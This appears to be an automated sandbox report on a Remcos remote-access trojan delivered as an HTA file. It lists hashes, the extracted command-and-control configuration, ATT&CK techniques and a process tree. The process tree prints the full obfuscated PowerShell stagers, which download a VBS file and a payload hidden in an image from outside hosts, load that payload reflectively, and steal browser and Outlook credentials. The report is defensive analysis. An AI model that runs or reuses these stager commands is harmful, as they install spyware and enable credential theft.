remcos | 63460bd959db60a47de9dfbc64c58abd983af187b29d7732987928c56a83a2e1

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-10-2024 10:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

newthingtobeonlinefor.hta
Size

117KB
MD5

02db2924d9d28415909466fd83d98bfb
SHA1

131f37687d5f92227dbf8db85537d8d588ba4c67
SHA256

63460bd959db60a47de9dfbc64c58abd983af187b29d7732987928c56a83a2e1
SHA512

7b7bec8c6f697b048d87e2af22e704caf7a2c05fdb1331e99d13d5baf0f5c625cf574d16c596d2dbb000b829bdb752437801c8bb833ed7e62dd1ae3f4c14d9f5
SSDEEP

96:Ea+M7+XoPsV9oPpF/4Ow5qouNREOX8MlV5BYoPItl8AT:Ea+Q+XoPsPoPX/4J54E3cqoPi9T

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

idabo.duckdns.org:6875

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-I89M3S
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4292-126-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1116-125-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4308-123-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4292-126-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4308-123-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	1280	powershell.exe
11	3688	powershell.exe
26	3688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2780	powershell.exe
3688	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1280	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3688 set thread context of 1976	3688	powershell.exe	99
PID 1976 set thread context of 4308	1976	RegAsm.exe	102
PID 1976 set thread context of 4292	1976	RegAsm.exe	103
PID 1976 set thread context of 1116	1976	RegAsm.exe	104

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1280	powershell.exe
1280	powershell.exe
2780	powershell.exe
2780	powershell.exe
3688	powershell.exe
3688	powershell.exe
4308	RegAsm.exe
4308	RegAsm.exe
1116	RegAsm.exe
1116	RegAsm.exe
4308	RegAsm.exe
4308	RegAsm.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1976	RegAsm.exe
1976	RegAsm.exe
1976	RegAsm.exe
1976	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	1116	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1976	RegAsm.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2940 wrote to memory of 4384	2940	mshta.exe	85
PID 2940 wrote to memory of 4384	2940	mshta.exe	85
PID 2940 wrote to memory of 4384	2940	mshta.exe	85
PID 4384 wrote to memory of 1280	4384	cmd.exe	87
PID 4384 wrote to memory of 1280	4384	cmd.exe	87
PID 4384 wrote to memory of 1280	4384	cmd.exe	87
PID 1280 wrote to memory of 3460	1280	powershell.exe	88
PID 1280 wrote to memory of 3460	1280	powershell.exe	88
PID 1280 wrote to memory of 3460	1280	powershell.exe	88
PID 3460 wrote to memory of 3056	3460	csc.exe	89
PID 3460 wrote to memory of 3056	3460	csc.exe	89
PID 3460 wrote to memory of 3056	3460	csc.exe	89
PID 1280 wrote to memory of 4072	1280	powershell.exe	90
PID 1280 wrote to memory of 4072	1280	powershell.exe	90
PID 1280 wrote to memory of 4072	1280	powershell.exe	90
PID 4072 wrote to memory of 2780	4072	WScript.exe	91
PID 4072 wrote to memory of 2780	4072	WScript.exe	91
PID 4072 wrote to memory of 2780	4072	WScript.exe	91
PID 2780 wrote to memory of 3688	2780	powershell.exe	93
PID 2780 wrote to memory of 3688	2780	powershell.exe	93
PID 2780 wrote to memory of 3688	2780	powershell.exe	93
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 3688 wrote to memory of 1976	3688	powershell.exe	99
PID 1976 wrote to memory of 3656	1976	RegAsm.exe	101
PID 1976 wrote to memory of 3656	1976	RegAsm.exe	101
PID 1976 wrote to memory of 3656	1976	RegAsm.exe	101
PID 1976 wrote to memory of 4308	1976	RegAsm.exe	102
PID 1976 wrote to memory of 4308	1976	RegAsm.exe	102
PID 1976 wrote to memory of 4308	1976	RegAsm.exe	102
PID 1976 wrote to memory of 4308	1976	RegAsm.exe	102
PID 1976 wrote to memory of 4292	1976	RegAsm.exe	103
PID 1976 wrote to memory of 4292	1976	RegAsm.exe	103
PID 1976 wrote to memory of 4292	1976	RegAsm.exe	103
PID 1976 wrote to memory of 4292	1976	RegAsm.exe	103
PID 1976 wrote to memory of 1116	1976	RegAsm.exe	104
PID 1976 wrote to memory of 1116	1976	RegAsm.exe	104
PID 1976 wrote to memory of 1116	1976	RegAsm.exe	104
PID 1976 wrote to memory of 1116	1976	RegAsm.exe	104

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\newthingtobeonlinefor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\am1jdpvh\am1jdpvh.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3460
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC19A.tmp" "c:\Users\Admin\AppData\Local\Temp\am1jdpvh\CSC2B49730ED28D4ADEBEB266D011AD6BA.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3056
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\verybestthingswesharedfornew.vbS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4072
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2780
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3688
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqqorgarccycrsdgewmwjlwajugkp"
        8⤵
        
        PID:3656
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqqorgarccycrsdgewmwjlwajugkp"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4308
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\isvhsztlykqhtzrknhzqmyrjkaqtimftd"
        8⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4292
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lmazs"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
280e55e61866a92afd52cb3ffe77f320

SHA1
e336a0a10178b449219b7eaa22c107af21fb36b7

SHA256
7144e66404c30a1033a2e8631f44aeabe7251e0e48617fb0aaf18444079c0c6d

SHA512
6d55bd626414ba8c7f528d2500d17ceeb56fa9e15cec5a6e9b7cefef6ff4eafd21e546481be0e538fee392f177dc85f4566cc3eaff6b4a88c9f7f8561e9ed883

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
8df9ebb96ea8d7666bd3a9e316540908

SHA1
a7b0195c002c7f12168c3f02dc4d878eb91751be

SHA256
09ffccd94336be0ac621089fd2768d6afa5c9509b08df7f44ad117e9544e00f0

SHA512
de9b178bef787ce1aaf869191572c63e175b87bb39d50137bdf634c3fbacc6228128be42ec24ae7e9c064d0fb38c960022c26489528aae2244c817faa1010dd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
deafa1fc07c976fe007e88f9ced49c9b

SHA1
f033da4d5621087e0c34520339357df908e44b6b

SHA256
551b90b389b68c6fbd7c082c92a32f2493fbd55c2ed405ce9b723c6df5ecad1a

SHA512
d4d8caa2a1d002d0293df21dcc0d9355885d20b76458b34ee286e28726904dd201c179d42eeb527626fd29556dea0060e1ba4ad57b55fa69d57271e1d6fa0f0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC19A.tmp

Filesize
1KB

MD5
c46ae7a5dcb10480aba1bf62d0b51ae5

SHA1
a047fa1933130d806319db401a06d30dd8321f61

SHA256
881389e44de585eade5ee94e6fc104743857e5a0511ef5bece23313f626f78c8

SHA512
9b99cc7ba3056b1db3c06aa9d0d9ce0f692282b74c1e3cdfbdc1a4339bf932240bdd25b9a4867098f921fba2143e1bc3cd45b9110e75757c2d712ced2c8c8cb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fj4u1dg3.sub.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\am1jdpvh\am1jdpvh.dll

Filesize
3KB

MD5
68a63b805d37e83a17cca52d150cca2b

SHA1
98d6a52071b50f29f777c040bbf7ccd58b917147

SHA256
e31b01f591b11913e7dd7d942f037ea2a0f84bc6d2dfd917c7bd813bc273eb19

SHA512
3a8e8226bb0d4e288b4b6aa278f1edf7aa768aa7e7cb5d72ac4d261a6d7dd757de862fca25bf29923e9edb5fd7ba5f518fd18338d0633e8546c2c899022c4189

Download Submit
C:\Users\Admin\AppData\Local\Temp\yqqorgarccycrsdgewmwjlwajugkp

Filesize
4KB

MD5
16dfb23eaa7972c59c36fcbc0946093b

SHA1
1e9e3ff83a05131575f67e202d352709205f20f8

SHA256
36c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c

SHA512
a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc

Download Submit
C:\Users\Admin\AppData\Roaming\verybestthingswesharedfornew.vbS

Filesize
190KB

MD5
ffa76c6571f4f3d4e5e256586a8390b6

SHA1
00854060b1673d298068aaf9248129efe750eb93

SHA256
9e97607e9fb8ca4c56d9754b0a6d3fcd24b9816dc62de63be73869b17e5e8b24

SHA512
adc073aee0aa3c6c7f6bf08606d616bf64f7ecbfa9a095361185df8d041998505d044306af933482f11dc6d5d484154954cb315ac8e767dad19094f9bddb2c2a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\am1jdpvh\CSC2B49730ED28D4ADEBEB266D011AD6BA.TMP

Filesize
652B

MD5
bc15c46b12b10122b6580423aa3b4fcb

SHA1
8c024d88112afe5479830cf842a16e67dafc6604

SHA256
aa50999a35380fa8c584b20718ceb1137d746d27cafbd143f50a874c45d9f63c

SHA512
f8cfe0cc1728eabcc1c75b028cc74b014fa5d959c1ba3ed3d20747884a09bdc742da227b47cfd4a1e4dfa06473cdd94ca0e78acc195ed2dcbd3e2a46f75aa64a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\am1jdpvh\am1jdpvh.0.cs

Filesize
479B

